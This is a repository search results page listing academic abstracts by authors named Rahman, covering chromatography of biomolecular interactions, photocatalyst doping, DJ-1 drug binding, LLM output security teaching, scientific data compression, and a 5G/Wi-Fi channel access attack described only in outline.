skip to main content


Search for: All records

Creators/Authors contains: "Rahman, Md"

Note: When clicking on a Digital Object Identifier (DOI) number, you will be taken to an external site maintained by the publisher. Some full text articles may not yet be available without a charge during the embargo (administrative interval).
What is a DOI Number?

Some links on this page may take you to non-federal websites. Their policies may differ from this site.

  1. The analysis of biomolecular interactions is important in characterizing and understanding many fundamental processes that occur in the body and biological systems. A variety of methods are available for studying the extent and rate of binding of these interactions. Some of these techniques are homogeneous methods, with all interacting components being present in the solution-phase, while others are heterogeneous, such as involving both solution-phase and solid-phase components. LC and HPLC have often been used to study biomolecular processes. Although these chromatographic methods make use of both a liquid phase (i.e., the mobile phase and applied samples) and a solid phase (the stationary phase and support), they can be used to study solution-phase interactions. This review examines several strategies that have been developed and employed to use LC and HPLC for this purpose. These strategies include the Hummel-Dreyer method, solution-phase frontal analysis, and the use of physical entrapment for a soluble component of a biomolecular interaction. Other strategies that are discussed are those in which the stationary phase of the column is used as a secondary component or capture agent when studying a solution-phase interaction, as occurs in normal-role affinity chromatography and ultrafast affinity extraction. The general principles for each of these strategies will be considered, along with their advantages, potential limitations, and applications. 
    more » « less
    Free, publicly-accessible full text available March 1, 2026
  2. In recent years, ZnIn2S4 (ZIS) has garnered attention as a promising photocatalyst due to its attractive properties. However, its performance is hindered by its restricted range of visible light absorption and the rapid recombination of photoinduced holes and electrons. Single-atom co-catalysts (SACs) can improve photocatalytic activity by providing highly active sites for reactions, enhancing charge separation efficiency, and reducing the recombination rate of photo-generated carriers. In this work, we perform high-throughput density functional theory (DFT) computations to search for SACs in ZIS encompassing 3d, 4d, and 5d transition metals as well as lanthanides, considering both substitutional and interstitial sites. For a total of 172 SACs, defect formation energy (DFE) is computed as a function of chemical potential, charge, and Fermi level (EF), leading to the identification of low energy dopants and their corresponding shallow or deep defect levels. Statistical data analysis shows that DFE is highly correlated with the difference in electron affinity between the host (Zn/In/S) atom and the SAC, followed by the electronegativity and boiling point. Among the 60 lowest energy SACs, Co_In, Yb_i, Tc_Zn, Au_S, La_i, Eu_i, Au_i, Ta_In, Hf_In, Zr_In, and Ni_Zn lead to a lowering of the Gibbs free energy for hydrogen evolution reaction, improving upon previous ZIS results. The computational dataset and insights from this work promise to accelerate the experimental design of novel dopants in ZIS with optimized properties for photocatalysis and environmental remediation. 
    more » « less
    Free, publicly-accessible full text available October 28, 2025
  3. Background: DJ-1 is a protein whose mutation causes rare heritable forms of Parkinson’s disease (PD) and is of interest as a target for treating PD and other disorders. This work used high performance affinity microcolumns to screen and examine the binding of small molecules to DJ-1, as could be used to develop new therapeutics or to study the role of DJ-1 in PD. Non-covalent entrapment was used to place microgram quantities of DJ-1 in an unmodified form within microcolumns, which were then used in multiple studies to analyze binding by model compounds and possible drug candidates to DJ-1. Results: Several factors were examined in optimizing the entrapment method, including the addition of a reducing agent to maintain a reduced active site cysteine residue in DJ-1, the concentration of DJ-1 employed, and the entrapment times. Isatin was used as a known binding agent (dissociation constant, ~2.0 µM) and probe for DJ-1 activity. This compound gave good retention on 2.0 cm × 2.1 mm inner diameter DJ-1 microcolumns made under the final entrapment conditions, with a typical retention factor of 14 and elution in ~8 min at 0.50 mL/min. These DJ-1 microcolumns were used to evaluate the binding of small molecules that were selected in silico to bind or not to bind DJ-1. A compound predicted to have good binding with DJ-1 gave a retention factor of 122, an elution time of ~15 min at 0.50 mL/min, and an estimated dissociation constant for this protein of 0.5 µM. Significance: These chromatographic tools can be used in future work to screen additional possible binding agents for DJ-1 or adapted for examining drug candidates for other proteins. This work represents the first time protein entrapment has been deployed with DJ-1, and it is the first experimental confirmation of binding to DJ-1 by a small lead compound selected in silico. 
    more » « less
    Free, publicly-accessible full text available January 1, 2026
  4. Free, publicly-accessible full text available October 1, 2025
  5. Large Language Models (LLMs) have extensive ability to produce promising output. Nowadays, people are increasingly relying on them due to easy accessibility, rapid and outstanding outcomes. However, the use of these results without appropriate scrutiny poses serious security risks, particularly when they are integrated with other software, APIs, or plugins. This is because the LLM outputs are highly dependent on the prompts they receive. Therefore, it is essential to carefully clean these outputs before using them in additional software environments. This paper is designed to teach students about the potential dangers of contaminated LLM output within the context of web development through prelab, handson, and postlab experiences. Hands-on lab provides practical guidance on how to handle LLM vulnerabilities to make applications safe with some real-world examples in Python. This approach aims to provide students with a deeper understanding of the precautions necessary to ensure software against the vulnerabilities introduced by LLM output. 
    more » « less
    Free, publicly-accessible full text available July 2, 2025
  6. Large Language Models (LLMs) have extensive ability to produce promising output. Nowadays, people are increasingly relying on them due to easy accessibility, rapid and outstanding outcomes. However, the use of these results without appropriate scrutiny poses serious security risks, particularly when they are integrated with other software, APIs, or plugins. This is because the LLM outputs are highly dependent on the prompts they receive. Therefore, it is essential to carefully clean these outputs before using them in additional software environments. This paper is designed to teach students about the potential dangers of contaminated LLM output within the context of web development through prelab, handson, and postlab experiences. Hands-on lab provides practical guidance on how to handle LLM vulnerabilities to make applications safe with some real-world examples in Python. This approach aims to provide students with a deeper understanding of the precautions necessary to ensure software against the vulnerabilities introduced by LLM output. 
    more » « less
    Free, publicly-accessible full text available July 2, 2025
  7. Free, publicly-accessible full text available July 2, 2025
  8. Scientific simulations running on HPC facilities generate massive amount of data, putting significant pressure onto supercomputers’ storage capacity and network bandwidth. To alleviate this problem, there has been a rich body of work on reducing data volumes via error-controlled lossy compression. However, fixed-ratio compression is not very well-supported, not allowing users to appropriately allocate memory/storage space or know the data transfer time over the network in advance. To address this problem, recent ratio-controlled frameworks, such as FXRZ, have incorporated methods to predict required error bound settings to reach a user-specified compression ratio. However, these approaches fail to achieve fixed-ratio compression in an accurate, efficient and scalable fashion on diverse datasets and compression algorithms. This work proposes an efficient, scalable, ratio-controlled lossy compression framework (CAROL). At the core of CAROL are four optimization strategies that allow for improving the prediction accuracy and runtime efficiency over state-of-the-art solutions. First, CAROL uses surrogate-based compression ratio estimation to generate training data. Second, it includes a novel calibration method to improve prediction accuracy across a variety of compressors. Third, it leverages Bayesian optimization to allow for efficient training and incremental model refinement. Forth, it uses GPU acceleration to speed up prediction. We evaluate CAROL on four compression algorithms and six scientific datasets. On average, when compared to the state-of-the-art FXRZ framework, CAROL achieves 4 × speedup in setup time and 36 × speedup in inference time, while maintaining less than 1% difference in estimation accuracy. 
    more » « less
    Free, publicly-accessible full text available August 12, 2025
  9. Free, publicly-accessible full text available June 17, 2025
  10. Spectrum coexistence between 5G and Wi-Fi in the coveted 5GHz spectrum band unleashes new possibilities for more effective spectrum utilization. While the Listen-Before-Talk-based channel access mechanism with the self-deferral-based method enhances the relative fairness of this coexistence framework, it introduces new vulnerabilities yet to be addressed. This research presents a unique attack approach, Random Channel Access Deterrence (RanCAD), that exploits a novel vulnerability in the channel access mechanism. In the proposed attack, a malicious access point deceives a victim 5G base station into deferring its access to the shared channel, resulting in higher channel access delay and lower spectrum utilization. In addition, we propose a Discrete Time Markov Chain (DTMC) to study the proposed attack model, which helps illustrate the attack's impact on the victim's performance. To our knowledge, this is the first work to introduce this vulnerability in the channel access mechanism between coexisting 5G and Wi-Fi networks in the 5GHz band. 
    more » « less
    Free, publicly-accessible full text available June 9, 2025